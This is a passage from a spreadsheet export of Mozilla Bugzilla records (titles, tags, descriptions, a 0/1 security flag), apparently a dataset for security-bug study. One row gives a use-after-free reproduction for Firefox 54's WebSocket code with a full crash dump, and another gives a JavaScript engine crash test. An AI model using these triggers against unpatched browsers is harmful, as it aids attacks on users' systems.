      <c r="O1845" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1845" t="inlineStr">
        <is>
          <t>[adv-main45+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q1845" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1845" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1845" t="inlineStr">
        <is>
          <t>mozilla47</t>
        </is>
      </c>
      <c r="T1845" t="n">
        <v>1</v>
      </c>
      <c r="U1845" t="n">
        <v>0</v>
      </c>
      <c r="V1845" t="n">
        <v>32</v>
      </c>
      <c r="W1845" t="inlineStr">
        <is>
          <t>https://bugzilla.mozilla.org/show_bug.cgi?id=1244493#c9
This comment is wrong if Shutdown() is called from the destructor before the Cameras/PBackground thread has been shut down:
https://dxr.mozilla.org/mozilla-central/rev/2dfb45d74f42d2a0010696f5fd47c7a7da94cedb/dom/media/systemservices/CamerasChild.cpp#518
This is not an owning reference (see https://dxr.mozilla.org/mozilla-central/rev/2dfb45d74f42d2a0010696f5fd47c7a7da94cedb/dom/media/systemservices/CamerasChild.h#106)
This case occurs if the protocol handlers get shut down due to an IPC error.</t>
        </is>
      </c>
      <c r="X1845" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1846">
      <c r="A1846" t="n">
        <v>1187272</v>
      </c>
      <c r="B1846" t="inlineStr">
        <is>
          <t>2015-07-24 04:02:39 -0700</t>
        </is>
      </c>
      <c r="C1846" t="inlineStr">
        <is>
          <t>[EME] Update Adobe CDM to version 12</t>
        </is>
      </c>
      <c r="D1846" t="inlineStr">
        <is>
          <t>2015-07-24 12:11:53 -0700</t>
        </is>
      </c>
      <c r="E1846" t="n">
        <v>1</v>
      </c>
      <c r="F1846" t="n">
        <v>1</v>
      </c>
      <c r="G1846" t="n">
        <v>5</v>
      </c>
      <c r="H1846" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1846" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J1846" t="inlineStr">
        <is>
          <t>Release Requests</t>
        </is>
      </c>
      <c r="K1846" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1846" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1846" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1846" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1846" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1846" t="inlineStr"/>
      <c r="Q1846" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1846" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1846" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1846" t="n">
        <v>1</v>
      </c>
      <c r="U1846" t="n">
        <v>0</v>
      </c>
      <c r="V1846" t="n">
        <v>3</v>
      </c>
      <c r="W1846" t="inlineStr">
        <is>
          <t>We have a new Adobe EME GMP update:
https://cdmdownload.adobe.com/firefox/win/x86/primetime_gmp_win_x86_rc_24140.1.zip 
The SHA512 digest is: 96103b4415354ba8b89f9be206ee029c8d6c0e43d4a8beb96fd7ecbb72bace7238840600d507a8d43396232762a8e37f16926a9e776dce6654940d836c60e520
Version: 12
I have tested this with 38, 39, 40, 41, and 42.
Can we please change our AUS update.xml file to download this new Adobe EME GMP, for Win32 Firefox builds on Windows Vista and later, Firefox 38 (thirty eight) and later.</t>
        </is>
      </c>
      <c r="X1846" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1847">
      <c r="A1847" t="n">
        <v>584357</v>
      </c>
      <c r="B1847" t="inlineStr">
        <is>
          <t>2010-08-04 07:21:30 -0700</t>
        </is>
      </c>
      <c r="C1847" t="inlineStr">
        <is>
          <t>TextRunWordCache::MakeTextRun doesn't null check new [] result</t>
        </is>
      </c>
      <c r="D1847" t="inlineStr">
        <is>
          <t>2010-09-27 18:32:55 -0700</t>
        </is>
      </c>
      <c r="E1847" t="n">
        <v>1</v>
      </c>
      <c r="F1847" t="n">
        <v>1</v>
      </c>
      <c r="G1847" t="n">
        <v>3</v>
      </c>
      <c r="H1847" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1847" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1847" t="inlineStr">
        <is>
          <t>Layout: Text and Fonts</t>
        </is>
      </c>
      <c r="K1847" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1847" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1847" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1847" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1847" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1847" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q1847" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1847" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1847" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1847" t="n">
        <v>1</v>
      </c>
      <c r="U1847" t="n">
        <v>0</v>
      </c>
      <c r="V1847" t="n">
        <v>8</v>
      </c>
      <c r="W1847" t="inlineStr">
        <is>
          <t>This *might* be the reason for bug 583077, at least on branches.</t>
        </is>
      </c>
      <c r="X1847" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1848">
      <c r="A1848" t="n">
        <v>1374047</v>
      </c>
      <c r="B1848" t="inlineStr">
        <is>
          <t>2017-06-18 03:51:35 -0700</t>
        </is>
      </c>
      <c r="C1848" t="inlineStr">
        <is>
          <t>WebSocket - Use After Free in WebSocketImpl::DisconnectInternal()</t>
        </is>
      </c>
      <c r="D1848" t="inlineStr">
        <is>
          <t>2024-05-30 09:34:29 -0700</t>
        </is>
      </c>
      <c r="E1848" t="n">
        <v>1</v>
      </c>
      <c r="F1848" t="n">
        <v>1</v>
      </c>
      <c r="G1848" t="n">
        <v>3</v>
      </c>
      <c r="H1848" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1848" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1848" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K1848" t="inlineStr">
        <is>
          <t>54 Branch</t>
        </is>
      </c>
      <c r="L1848" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1848" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1848" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1848" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1848" t="inlineStr">
        <is>
          <t>[adv-main55+][adv-esr52.3+]</t>
        </is>
      </c>
      <c r="Q1848" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1848" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1848" t="inlineStr">
        <is>
          <t>mozilla56</t>
        </is>
      </c>
      <c r="T1848" t="n">
        <v>1</v>
      </c>
      <c r="U1848" t="n">
        <v>0</v>
      </c>
      <c r="V1848" t="n">
        <v>24</v>
      </c>
      <c r="W1848" t="inlineStr">
        <is>
          <t>Created attachment 8878874
UAF_DisconnectInternal_Repro.js
Reproduction test case (whole server code in attached file UAF_DisconnectInternal_Repro.js):
	Main page code:
		&lt;script&gt;
		var worker0 = new Worker("worker0.js");
		setTimeout(function(){ worker0.terminate();}, 200);
		setTimeout(function(){location.reload()},200);
		&lt;/script&gt;
	Worker code:
		new WebSocket("ws://localhost:12345/", "wsm1-protocol");;
Steps to reproduce: 
	1. Run server side script UAF_DisconnectInternal_Repro.js with Node.js (node UAF_DisconnectInternal_Repro.js).
	2. Enter http://localhost:12345 in Firefox browser.
Firefox version: 54.0 (32-bit)
OS: Windows 10
Stack trace:
	(16a8.30b4): Access violation - code c0000005 (!!! second chance !!!)
	eax=00000000 ebx=18d77028 ecx=18d77028 edx=e5e5e5e5 esi=67d4b030 edi=18d76f80
	eip=65f98e0c esp=0117f1cc ebp=0117f1cc iopl=0         nv up ei ng nz na po nc
	cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010282
	xul!mozilla::RefPtrTraits&lt;mozilla::EditTransactionBase&gt;::Release [inlined in xul!RefPtr&lt;mozilla::EditTransactionBase&gt;::assign_assuming_AddRef+0x12]:
	65f98e0c 8b02            mov     eax,dword ptr [edx]  ds:002b:e5e5e5e5=????????
	0:000&gt; !analyze -v
	*******************************************************************************
	*                                                                             *
	*                        Exception Analysis                                   *
	*                                                                             *
	*******************************************************************************
	FAULTING_IP: 
	xul!RefPtr&lt;mozilla::EditTransactionBase&gt;::assign_assuming_AddRef+12 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\obj-firefox\dist\include\mozilla\refptr.h @ 65]
	65f98e0c 8b02            mov     eax,dword ptr [edx]
	EXCEPTION_RECORD:  (.exr -1)
	ExceptionAddress: 65f98e0c (xul!mozilla::RefPtrTraits&lt;mozilla::EditTransactionBase&gt;::Release)
	   ExceptionCode: c0000005 (Access violation)
	  ExceptionFlags: 00000000
	NumberParameters: 2
	   Parameter[0]: 00000000
	   Parameter[1]: e5e5e5e5
	Attempt to read from address e5e5e5e5
	FAULTING_THREAD:  000030b4
	PROCESS_NAME:  firefox.exe
	ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
	EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
	EXCEPTION_CODE_STR:  c0000005
	EXCEPTION_PARAMETER1:  00000000
	EXCEPTION_PARAMETER2:  e5e5e5e5
	FOLLOWUP_IP: 
	xul!RefPtr&lt;mozilla::EditTransactionBase&gt;::assign_assuming_AddRef+12 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\obj-firefox\dist\include\mozilla\refptr.h @ 65]
	65f98e0c 8b02            mov     eax,dword ptr [edx]
	READ_ADDRESS:  e5e5e5e5 
	WATSON_BKT_PROCSTAMP:  59399e7c
	WATSON_BKT_PROCVER:  54.0.0.6368
	PROCESS_VER_PRODUCT:  Firefox
	WATSON_BKT_MODULE:  xul.dll
	WATSON_BKT_MODSTAMP:  5939a290
	WATSON_BKT_MODOFFSET:  88e0c
	WATSON_BKT_MODVER:  54.0.0.6368
	MODULE_VER_PRODUCT:  Firefox
	BUILD_VERSION_STRING:  10.0.15063.296 (WinBuild.160101.0800)
	MODLIST_WITH_TSCHKSUM_HASH:  6677a630c80a09dae24ad5f75ef967a3823bc5ff
	MODLIST_SHA1_HASH:  d474cec995c2004a6ffece945bcd0a3e7837f453
	NTGLOBALFLAG:  70
	PROCESS_BAM_CURRENT_THROTTLED: 0
	PROCESS_BAM_PREVIOUS_THROTTLED: 0
	APPLICATION_VERIFIER_FLAGS:  0
	PRODUCT_TYPE:  1
	SUITE_MASK:  784
	DUMP_TYPE:  fe
	ANALYSIS_SESSION_TIME:  06-18-2017 22:32:19.0170
	ANALYSIS_VERSION: 10.0.15063.400 x86fre
	THREAD_ATTRIBUTES: 
	OS_LOCALE:  ENA
	PROBLEM_CLASSES: 
		ID:     [0n292]
		Type:   [@ACCESS_VIOLATION]
		Class:  Addendum
		Scope:  BUCKET_ID
		Name:   Omit
		Data:   Omit
		PID:    [Unspecified]
		TID:    [0x30b4]
		Frame:  [0] : xul!RefPtr&lt;mozilla::EditTransactionBase&gt;::assign_assuming_AddRef
		ID:     [0n264]
		Type:   [INVALID_POINTER_READ]
		Class:  Primary
		Scope:  DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
				BUCKET_ID
		Name:   Add
		Data:   Omit
		PID:    [Unspecified]
		TID:    [0x30b4]
		Frame:  [0] : xul!RefPtr&lt;mozilla::EditTransactionBase&gt;::assign_assuming_AddRef
		ID:     [0n94]
		Type:   [FILL_PATTERN]
		Class:  Addendum
		Scope:  DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
				BUCKET_ID
		Name:   Add
		Data:   Add
				String: [e5e5e5e5]
		PID:    [0x16a8]
		TID:    [0x30b4]
		Frame:  [0] : xul!RefPtr&lt;mozilla::EditTransactionBase&gt;::assign_assuming_AddRef
	BUGCHECK_STR:  APPLICATION_FAULT_INVALID_POINTER_READ_FILL_PATTERN_e5e5e5e5
	DEFAULT_BUCKET_ID:  INVALID_POINTER_READ_FILL_PATTERN_e5e5e5e5
	PRIMARY_PROBLEM_CLASS:  APPLICATION_FAULT
	LAST_CONTROL_TRANSFER:  from 66cb658b to 65f98e0c
	STACK_TEXT:  
	0117f1cc 66cb658b 00000000 00000000 16daeee0 xul!RefPtr&lt;mozilla::EditTransactionBase&gt;::assign_assuming_AddRef+0x12
	0117f1fc 66cba1d4 6620c149 15ac8ec0 15ac8ef4 xul!mozilla::dom::WebSocketImpl::DisconnectInternal+0x4b
	0117f200 6620c149 15ac8ec0 15ac8ef4 00000000 xul!mozilla::dom::`anonymous namespace'::DisconnectInternalRunnable::MainThreadRun+0x8
	0117f214 6620c109 16daeee0 13981380 139813b4 xul!mozilla::dom::workers::WorkerMainThreadRunnable::Run+0x15
	0117f23c 6620c08d 0117f26c 6620c109 180ec050 xul!mozilla::ThrottledEventQueue::Inner::ExecuteRunnable+0x76
	0117f244 6620c109 180ec050 0b1f5864 180ec060 xul!mozilla::ThrottledEventQueue::Inner::Executor::Run+0xe
	0117f26c 6620c08d 0117f2e4 6601f80e 180ec060 xul!mozilla::ThrottledEventQueue::Inner::ExecuteRunnable+0x76
	0117f274 6601f80e 180ec060 03127170 03127160 xul!mozilla::ThrottledEventQueue::Inner::Executor::Run+0xe
	0117f2e4 66020701 03104200 00000000 0117f317 xul!nsThread::ProcessNextEvent+0x213
	0117f318 66068ea0 03125060 60944f31 0b1f5860 xul!mozilla::ipc::MessagePump::Run+0x72
	0117f350 66068e6f 03104200 00000001 0b1f5800 xul!MessageLoop::RunHandler+0x20
	0117f370 662d19d8 0b1f7640 00000000 0117f390 xul!MessageLoop::Run+0x19
	0117f380 662d1767 0b1f5860 0b1f7640 0117f3a4 xul!nsBaseAppShell::Run+0x34
	0117f390 662d171c 0b1f5860 0117f6f5 0c30a440 xul!nsAppShell::Run+0x26
	0117f3a4 66505f9e 0b1f7640 0117f5f8 0117f610 xul!nsAppStartup::Run+0x22
	0117f598 665069d0 03103050 0117f740 00000001 xul!XREMain::XRE_mainRun+0xa92
	0117f5d4 6658b805 00000000 0117f610 0017f740 xul!XREMain::XRE_main+0x37b
	0117f700 6658b7c7 0117f740 0117fa84 01321bdd xul!XRE_main+0x39
	0117f70c 01321bdd 00000001 03103050 0117f740 xul!mozilla::BootstrapImpl::XRE_main+0x11
	0117fa84 01325b7f 00000001 fe615d08 01718b50 firefox!wmain+0x65d
	0117facc 73b48744 00ee0000 73b48720 7b9e292a firefox!__scrt_common_main_seh+0xf9
	0117fae0 770a587d 00ee0000 7f378ec4 00000000 KERNEL32!BaseThreadInitThunk+0x24
	0117fb28 770a584d ffffffff 770c6344 00000000 ntdll!__RtlUserThreadStart+0x2f
	0117fb38 00000000 01325bf5 00ee0000 00000000 ntdll!_RtlUserThreadStart+0x1b
	THREAD_SHA1_HASH_MOD_FUNC:  c69ed9af77e0e3ae8946fbf3e674aa21f178e624
	THREAD_SHA1_HASH_MOD_FUNC_OFFSET:  b2a6a3a18b4b25d90fe64452661d0eb068d1731a
	THREAD_SHA1_HASH_MOD:  1e517827cf137402b6881f2d4a04f0647425c5be
	FAULT_INSTR_CODE:  ff52028b
	FAULTING_SOURCE_LINE:  c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\obj-firefox\dist\include\mozilla\refptr.h
	FAULTING_SOURCE_FILE:  c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\obj-firefox\dist\include\mozilla\refptr.h
	FAULTING_SOURCE_LINE_NUMBER:  65
	SYMBOL_STACK_INDEX:  0
	SYMBOL_NAME:  xul!RefPtr&lt;mozilla::EditTransactionBase&gt;::assign_assuming_AddRef+12
	FOLLOWUP_NAME:  MachineOwner
	MODULE_NAME: xul
	IMAGE_NAME:  xul.dll
	DEBUG_FLR_IMAGE_TIMESTAMP:  5939a290
	STACK_COMMAND:  ~0s ; kb
	FAILURE_BUCKET_ID:  INVALID_POINTER_READ_FILL_PATTERN_e5e5e5e5_c0000005_xul.dll!RefPtr_mozilla::EditTransactionBase_::assign_assuming_AddRef
	BUCKET_ID:  APPLICATION_FAULT_INVALID_POINTER_READ_FILL_PATTERN_e5e5e5e5_xul!RefPtr_mozilla::EditTransactionBase_::assign_assuming_AddRef+12
	FAILURE_EXCEPTION_CODE:  c0000005
	FAILURE_IMAGE_NAME:  xul.dll
	BUCKET_ID_IMAGE_STR:  xul.dll
	FAILURE_MODULE_NAME:  xul
	BUCKET_ID_MODULE_STR:  xul
	FAILURE_FUNCTION_NAME:  RefPtr_mozilla::EditTransactionBase_::assign_assuming_AddRef
	BUCKET_ID_FUNCTION_STR:  RefPtr_mozilla::EditTransactionBase_::assign_assuming_AddRef
	BUCKET_ID_OFFSET:  12
	BUCKET_ID_MODTIMEDATESTAMP:  5939a290
	BUCKET_ID_MODCHECKSUM:  31298a4
	BUCKET_ID_MODVER_STR:  54.0.0.6368
	BUCKET_ID_PREFIX_STR:  APPLICATION_FAULT_INVALID_POINTER_READ_FILL_PATTERN_e5e5e5e5_
	FAILURE_PROBLEM_CLASS:  APPLICATION_FAULT
	FAILURE_SYMBOL_NAME:  xul.dll!RefPtr_mozilla::EditTransactionBase_::assign_assuming_AddRef
	WATSON_STAGEONE_URL:  http://watson.microsoft.com/StageOne/firefox.exe/54.0.0.6368/59399e7c/xul.dll/54.0.0.6368/5939a290/c0000005/00088e0c.htm?Retriage=1
	TARGET_TIME:  2017-06-18T10:33:04.000Z
	OSBUILD:  15063
	OSSERVICEPACK:  296
	SERVICEPACK_NUMBER: 0
	OS_REVISION: 0
	OSPLATFORM_TYPE:  x86
	OSNAME:  Windows 10
	OSEDITION:  Windows 10 WinNt SingleUserTS Personal
	USER_LCID:  0
	OSBUILD_TIMESTAMP:  unknown_date
	BUILDDATESTAMP_STR:  160101.0800
	BUILDLAB_STR:  WinBuild
	BUILDOSVER_STR:  10.0.15063.296
	ANALYSIS_SESSION_ELAPSED_TIME:  104d4
	ANALYSIS_SOURCE:  UM
	FAILURE_ID_HASH_STRING:  um:invalid_pointer_read_fill_pattern_e5e5e5e5_c0000005_xul.dll!refptr_mozilla::edittransactionbase_::assign_assuming_addref
	FAILURE_ID_HASH:  {6bdf5e90-d575-dd3a-0b53-74c46bf9fa98}
	Followup:     MachineOwner
	---------
Variable shows the WebSocketImpl object had been freed:
	0:000&gt; dt this
	Local var @ edi Type mozilla::dom::WebSocketImpl*
	   +0x000 __VFN_table : 0xe5e5e5e5 
	   +0x004 __VFN_table : 0xe5e5e5e5 
	   +0x008 __VFN_table : 0xe5e5e5e5 
	   +0x00c __VFN_table : 0xe5e5e5e5 
	   +0x010 mProxy           : 0xe5e5e5e5 nsWeakReference
	   +0x014 __VFN_table : 0xe5e5e5e5 
	   +0x018 __VFN_table : 0xe5e5e5e5 
	   +0x01c mRefCnt          : mozilla::ThreadSafeAutoRefCnt
	   +0x020 mWebSocket       : RefPtr&lt;mozilla::dom::WebSocket&gt;
	   +0x024 mChannel         : nsCOMPtr&lt;nsIWebSocketChannel&gt;
	   +0x028 mIsServerSide    : ffffffffffffffe5
	   +0x029 mSecure          : ffffffffffffffe5
	   +0x02a mOnCloseScheduled : ffffffffffffffe5
	   +0x02b mFailed          : ffffffffffffffe5
	   +0x02c mDisconnectingOrDisconnected : ffffffffffffffe5
	   +0x02d mCloseEventWasClean : ffffffffffffffe5
	   +0x030 mCloseEventReason : nsString
	   +0x03c mCloseEventCode  : 0xe5e5
	   +0x040 mAsciiHost       : nsCString
	   +0x04c mPort            : 0xe5e5e5e5
	   +0x050 mResource        : nsCString
	   +0x05c mUTF16Origin     : nsString
	   +0x068 mURI             : nsCString
	   +0x074 mRequestedProtocolList : nsCString
	   +0x080 mOriginDocument  : nsCOMPtr&lt;nsIWeakReference&gt;
	   +0x084 mScriptFile      : nsCString
	   +0x090 mScriptLine      : 0xe5e5e5e5
	   +0x094 mScriptColumn    : 0xe5e5e5e5
	   +0x098 mInnerWindowID   : 0xe5e5e5e5`e5e5e5e5
	   +0x0a0 mWorkerPrivate   : 0xe5e5e5e5 mozilla::dom::workers::WorkerPrivate
	   +0x0a4 mWorkerHolder    : nsAutoPtr&lt;mozilla::dom::workers::WorkerHolder&gt;
	   +0x0a8 mWeakLoadGroup   : nsCOMPtr&lt;nsIWeakReference&gt;
	   +0x0ac mIsMainThread    : ffffffffffffffe5
	   +0x0b0 mMutex           : mozilla::Mutex
	   +0x0b4 mWorkerShuttingDown : ffffffffffffffe5
	   +0x0b8 mService         : RefPtr&lt;mozilla::net::WebSocketEventService&gt;</t>
        </is>
      </c>
      <c r="X1848" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1849">
      <c r="A1849" t="n">
        <v>719750</v>
      </c>
      <c r="B1849" t="inlineStr">
        <is>
          <t>2012-01-20 03:57:29 -0800</t>
        </is>
      </c>
      <c r="C1849" t="inlineStr">
        <is>
          <t>Assertion failure: [infer failure] Missing type pushed 0: int with destructuring assignment</t>
        </is>
      </c>
      <c r="D1849" t="inlineStr">
        <is>
          <t>2012-10-21 22:17:25 -0700</t>
        </is>
      </c>
      <c r="E1849" t="n">
        <v>1</v>
      </c>
      <c r="F1849" t="n">
        <v>1</v>
      </c>
      <c r="G1849" t="n">
        <v>3</v>
      </c>
      <c r="H1849" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1849" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1849" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1849" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1849" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1849" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1849" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1849" t="inlineStr">
        <is>
          <t>WORKSFORME</t>
        </is>
      </c>
      <c r="P1849" t="inlineStr">
        <is>
          <t>[sg:critical][advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q1849" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1849" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1849" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1849" t="n">
        <v>1</v>
      </c>
      <c r="U1849" t="n">
        <v>0</v>
      </c>
      <c r="V1849" t="n">
        <v>15</v>
      </c>
      <c r="W1849" t="inlineStr">
        <is>
          <t>The following test asserts on mozilla-central revision e5e66f40c35b (options -n -m -a):
function f( )  {
  var [ [x], e ]  = ["*", "/", "%"];
    function h() {
      for (var i = 0; i &lt; 5; ++i) {
        x = i * 2;
      }
    }
    h();
  assertEq(x, 8);
} 
f();
This bug strongly reminds me of bug 685321 which also had a destructuring assignment. S-s due to infer failure.</t>
        </is>
      </c>
      <c r="X1849" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1850">
      <c r="A1850" t="n">
        <v>600974</v>
      </c>
      <c r="B1850" t="inlineStr">
        <is>
          <t>2010-09-30 14:23:25 -0700</t>
        </is>
      </c>
      <c r="C1850" t="inlineStr">
        <is>
          <t>crash (nsUTF8ToUnicode overruns buffer by 2 bytes outputting surrogate pair) on :first-letter punctuation test in CSS 2.1 test suite</t>
        </is>
      </c>
      <c r="D1850" t="inlineStr">
        <is>
          <t>2011-05-18 18:18:03 -0700</t>
        </is>
      </c>
      <c r="E1850" t="n">
        <v>1</v>
      </c>
      <c r="F1850" t="n">
        <v>1</v>
      </c>
      <c r="G1850" t="n">
        <v>3</v>
      </c>
      <c r="H1850" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1850" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1850" t="inlineStr">
        <is>
          <t>Internationalization</t>
        </is>
      </c>
      <c r="K1850" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1850" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1850" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1850" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1850" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1850" t="inlineStr">
        <is>
          <t>[sg:critical?] [qa-examined-191] [qa-examined-192] [qa-needs-STR] private until 634257 is unhidden</t>
        </is>
      </c>
      <c r="Q1850" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1850" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1850" t="inlineStr">
        <is>
          <t>mozilla2.0</t>
        </is>
      </c>
      <c r="T1850" t="n">
        <v>1</v>
      </c>
      <c r="U1850" t="n">
        <v>0</v>
      </c>
      <c r="V1850" t="n">
        <v>51</v>
      </c>
      <c r="W1850" t="inlineStr">
        <is>
          <t>Loading the following test in the CSS 2.1 test suite (which is derived from a test I wrote):
crashes Firefox intermittently.
Steps to reproduce:
 1. load http://test.csswg.org/suites/css2.1/20100917/html4/first-letter-punct-before-036.htm
 2. reload the page a few times
Actual results: crash, generally after less than 10 reloads
I've tested that this occurs on both 4.0b6 and on the 2010-09-30-03-mozilla-central nightly, in both cases on 64-bit Linux.
In a debug build, loading the page reliably triggers the assertions:
###!!! ASSERTION: The Unicode decoder wrote too much data.: 'end &lt;= NS_HTML5_STREAM_PARSER_READ_BUFFER_SIZE', file /home/dbaron/builds/mozilla-central/mozilla/parser/html/nsHtml5StreamParser.cpp, line 495
A buffer overrun causing a crash may well be exploitable (it's harder, but still possible, if it's a heap buffer overrun), so marking security-sensitive.</t>
        </is>
      </c>
      <c r="X1850" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1851">
      <c r="A1851" t="n">
        <v>1449158</v>
      </c>
      <c r="B1851" t="inlineStr">
        <is>
          <t>2018-03-27 05:36:09 -0700</t>
        </is>
      </c>
      <c r="C1851" t="inlineStr">
        <is>
          <t>FF 60 release notes: recommendation to use NSS_SDB_USE_CACHE=yes with network filesystems</t>
        </is>
      </c>
      <c r="D1851" t="inlineStr">
        <is>
          <t>2018-05-07 06:24:55 -0700</t>
        </is>
      </c>
      <c r="E1851" t="n">
        <v>1</v>
      </c>
      <c r="F1851" t="n">
        <v>1</v>
      </c>
      <c r="G1851" t="n">
        <v>2</v>
      </c>
      <c r="H1851" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1851" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1851" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1851" t="inlineStr">
        <is>
          <t>60 Branch</t>
        </is>
      </c>
      <c r="L1851" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1851" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1851" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1851" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1851" t="inlineStr"/>
      <c r="Q1851" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1851" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1851" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1851" t="n">
        <v>1</v>
      </c>
      <c r="U1851" t="n">
        <v>0</v>
      </c>
      <c r="V1851" t="n">
        <v>7</v>
      </c>
      <c r="W1851" t="inlineStr">
        <is>
          <t>Because Firefox ESR 60 targets enterprise users, and because it will be the first version of Firefox that contains the changes from bug 783994 and bug 1377940, and because of the experiences of some users as described in 1432484, the Firefox 60 release notes should contain the recommended workaround, which is to set the NSS_SDB_USE_CACHE=yes environment variable.</t>
        </is>
      </c>
      <c r="X1851" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1852">
      <c r="A1852" t="n">
        <v>1400339</v>
      </c>
      <c r="B1852" t="inlineStr">
        <is>
          <t>2017-09-15 11:18:19 -0700</t>
        </is>
      </c>
      <c r="C1852" t="inlineStr">
        <is>
          <t>The new progress indicator is at 0% when done</t>
        </is>
      </c>
      <c r="D1852" t="inlineStr">
        <is>
          <t>2017-09-27 08:48:37 -0700</t>
        </is>
      </c>
      <c r="E1852" t="n">
        <v>1</v>
      </c>
      <c r="F1852" t="n">
        <v>1</v>
      </c>
      <c r="G1852" t="n">
        <v>2</v>
      </c>
      <c r="H1852" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1852" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J1852" t="inlineStr">
        <is>
